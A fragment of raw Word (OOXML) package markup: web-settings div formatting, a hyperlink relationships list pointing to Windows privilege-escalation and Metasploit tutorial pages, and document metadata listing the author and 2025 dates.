          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1887523226">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="245967682">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1749114240">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="174730882">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="4767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viewer?url=http://www.insomniasec.com/publications/WindowsPrivEsc.ppt&amp;pli=1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.backtrack-linux.org/tutorials/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/windows/desktop/aa393660(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US&amp;pli=1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.insomniasec.com/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.offensive-security.com/metasploit-unleashed/Msfpayload" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://travisaltman.com/one-liner-commands-for-windows-cheat-sheet/"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travisaltman.com/wp-content/renameExploit.png" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sevenforums.com/system-security/164638-csrss-winlogon.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-1-local-administrator-privileges/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://travisaltman.com/wp-content/services.png" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.netspi.com/blog/author/ssutherland/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://travisaltman.com/wp-content/beforeExploit.png" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://rockmanx.wordpress.com/2008/01/09/memorable-quotes-from-full-metal-jacket/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.linfo.org/gui.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Windows_Task_Manager" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Active_Directory" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Windows_service" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.linuxjournal.com/content/tech-tip-really-simple-http-server-python" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://travisaltman.com/wp-content/ntvd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3327</Words>
  <Characters>18966</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>158</Lines>
  <Paragraphs>44</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>22249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Ramesh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Karan Ramesh</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-17T06:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-17T06:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>